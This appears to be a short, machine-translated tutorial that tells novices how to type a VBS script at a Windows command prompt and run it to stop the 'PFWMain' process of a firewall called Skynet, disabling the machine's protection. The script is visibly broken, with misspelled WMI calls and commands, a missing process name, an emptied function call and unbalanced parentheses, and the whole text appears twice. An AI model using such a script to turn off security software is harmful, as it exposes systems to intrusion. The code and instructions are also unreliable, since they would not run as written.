Write a VBS script:
Enter:
copy con (Note to novices: there is no command prompt after executing this line)
CODEstrComputer = "."
Set objWMIServive = GetObject("winmagmts:" _
& "{impersonationLevel=impcrsonatc}!\\" &strComputer & "\root\cimv2"
Set colProcesslist = _
("select * from Win32 Process Where Name = ''"
For Each objPrecess in colProcessList
()
Next
'PFWMain' is Skynet's firewall, you can change it yourself
After entering, press "CTRL"+"z" at the same time, and the command prompt will come out again.
Then it's executed:
csript
Enter:
copy con (Note to novices: there is no command prompt after executing this line)
CODEstrComputer = "."
Set objWMIServive = GetObject("winmagmts:" _
& "{impersonationLevel=impcrsonatc}!\\" &strComputer & "\root\cimv2"
Set colProcesslist = _
("select * from Win32 Process Where Name = ''"
For Each objPrecess in colProcessList
()
Next
'PFWMain' is Skynet's firewall, you can change it yourself
After entering, press "CTRL"+"z" at the same time, and the command prompt will come out again.
Then it's executed:
csript